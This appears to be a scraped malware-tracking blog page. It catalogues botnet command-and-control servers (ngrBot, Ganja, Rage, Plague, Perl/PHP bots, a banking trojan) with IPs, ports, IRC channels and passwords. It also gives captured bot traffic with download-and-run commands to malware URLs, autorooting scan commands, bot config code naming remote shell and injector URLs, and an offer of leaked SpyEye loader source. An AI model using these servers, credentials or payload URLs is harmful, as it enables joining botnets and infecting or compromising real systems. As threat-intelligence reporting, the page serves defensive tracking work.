SpyEye got pwned by Xylitol a jung french reverser here u have the source of Loader for SpyEye 1.3.45 Download Download Download i m not including executables because this is not made for helping lamers using spyeye learn from the source that’s all
208.117.34.101(ngrBot hosted in United States Laird Hill Steadfast Networks)
Remote Host Port Number 199.15.234.7 80 74.117.178.7 80 208.117.34.101 1888 PASS ngrBot PRIVMSG #XP :[d=”http://dc230.4shared.com/download/BAHlq0z5/refdf.exe” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 NICK n{US|XPa}olgmwse USER olgmwse 0 0 :olgmwse JOIN ##center 1963.g3rb3rs1t0.3691 JOIN #XP JOIN #new JOIN #US hosting infos: http://whois.domaintools.com/208.117.34.101
200.107.255.114(irc bot hosted in Ecuador Lutrol S.a)
Remote Host Port Number 174.121.14.164 80 174.36.56.201 80 188.40.87.249 80 195.210.28.38 80 195.250.147.177 80 204.2.197.201 80 208.94.1.214 80 209.17.74.144 80 66.115.184.85 80 66.115.184.87 80 200.107.255.114 4244 ircd here PASS google_cache2.tmp 74.125.157.120 443 NICK new[iRooT-XP-USA]338226 USER 3382 “” “TsGh” :3382 JOIN #!N!# WTF PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited! hosting infos: http://whois.domaintools.com/200.107.255.114
erofolio.no-ip.biz(Ganja bot hosted in United States Greenville Gsp Adsl Cbb)
Remote Host Port Number 184.168.48.1 80 74.177.79.142 6667 NICK [00|USA|XP|SP2]-2865 USER tufzv 0 0 :[00|USA|XP|SP2]-2865 USERHOST [00|USA|XP|SP2]-2865 MODE [00|USA|XP|SP2]-2865 -i JOIN #exe PRIVMSG #exe :-=MAIN=- Downloading update from: http://www.bloodyearlobesmusic.com/css/eFUD.exe PONG :55B3DFD6 Nick: New[GaNjA-XP-AUT]141568 Username: 8829 Joined Channel: #spiffy 46.105.241.160:6667 Nick: New{FR-XP-x86}5276416 Username: 5276416 Server Pass: secret Joined Channel: #justin with Password secret * The dataRead more...
gangbang.mytijn.org(linux bots hosted in India Noida Net4india Ltd)
$servidor = ‘gangbang.mytijn.org’ unless $servidor; my $porta = ‘25343’; my @adms = (“Ha45K”); my @canais = (“#e109#”); Resolved : [gangbang.mytijn.org] To [117.211.84.155] Resolved : [gangbang.mytijn.org] To [76.10.213.195] Resolved : [gangbang.mytijn.org] To [113.30.137.146] var $config = array(“server”=>”gangbang.mytijn.org”, “port”=>”23232”, “pass”=>””, “maxrand”=>”1”, “chan”=>”#wWw#”, “chan2″=>”#wWw#”, “key”=>”scan”, “modes”=>”+p”, “password”=>”41aa15390e2efa34ac693c3bd7cb8e88”, “trigger”=>”.”, “hostauth”=>”0wn3d.3u”); my $injector = “http://www.m-crystal.kz/backup/pbot.txt?”; my $botshell = “http://outdoorbg.com/e107_files/public/sh.txt?”; myRead more...
evrcrew.serveirc.com(plague bot hosted in India New Delhi Navatha Road Transport)
DNS : evrcrew.serveirc.com IP : 210.212.222.229 Port:6667 Nick: PLAGUE|7083101 Username: sxetpzexk Joined Channel: #ddos-hack with Password tuculoroto hosting infos: http://whois.domaintools.com/210.212.222.229
tres.hopto.org(rage bot hosted in Viet Nam Ip Range For Xdsl Iptv Fixed Phone Service At Hcmc)
DNS : tres.hopto.org IP:118.69.220.81 Port:6667 Nick: raGe|TGrBASsoCp Username: fadrqi Joined Channel: ##rage## with Password rage Channel Topic for Channel ##rage##: “.xpl 100 1 98 -b 3” Private Message to Channel ##rage##: “^C14,1.:[^C15,1rAGEBoT^C14,1]:.^C15,1 range: 98 with 100 threads. (autorooting)” Now talking in ##rage## Topic On: [ ##rage## ] [ .xpl 100 1 74 -b 3 ]Read more...
hacksecurity.dyndns.info(ragebot hosted in Germany Gunzenhausen Hetzner Online Ag)
DNS : hacksecurity.dyndns.info IP : 178.63.42.16 Port : 6667 Nick: raGe|VwyLaNJleo Username: bpddcu Joined Channel: ##vnc## with Password scan Channel Topic for Channel ##vnc##: “.rarworm .p2p .xpl 100 1 190 -b 3” Private Message to Channel ##vnc##: “^C14,1.:[^C15,1VNC^C14,1]:.^C15,1 range: 190 with 100 threads. (autorooting)” Private Message to Channel ##vnc##: “^C14,1.:[^C15,1VNC^C14,1]:.^C15,1 p2p spread started.” Private MessageRead more...
67.202.109.219(ngrBot hosted in United States Kansas City Steadfast Networks)
Remote Host Port Number 199.15.234.7 80 67.202.109.219 1888 PASS ngrBot NICK n{US|XPa}eechxgg USER eechxgg 0 0 :eechxgg JOIN ##center 1963.g3rb3rs1t0.3691 JOIN #XP JOIN #new JOIN #US Now talking in #xp Modes On: [ #xp ] [ +smntM ] Joins: {PE|XPa}vsyvzza [vsyvzza@2E710F5A.67294BC.28C8A9FB.IP] Joins: {PE|XPu}ctxapfg [ctxapfg@2FDEEB5D.B46253B1.36C54A63.IP] Joins: {PE|XPa}ytnyfsk [ytnyfsk@9ABA929D.9ACD4A9F.28C8A9FB.IP] Joins: n{ES|XPa}jdtltet [jdtltet@Crew-370EA58.dyn.user.ono.com] Joins: n{MX|XPu}mbjyydt [mbjyydt@DD10EA0D.A39565B0.72B527BA.IP] hosting infos:Read more...
Trojan-PWS.Banker5
Domains: cnt4cnt1.sites.uol.com.br www.netotransportes.com Resolved : [cnt4cnt1.sites.uol.com.br] To [200.147.33.17] Resolved : [cnt4cnt1.sites.uol.com.br] To [200.147.1.41] Resolved : [cnt4cnt1.sites.uol.com.br] To [200.147.33.19] Resolved : [cnt4cnt1.sites.uol.com.br] To [200.147.33.21] exe files: http://omeum4snovo.com/seuvideo/video.exe http://cnt4cnt1.sites.uol.com.br/bifpv.jpg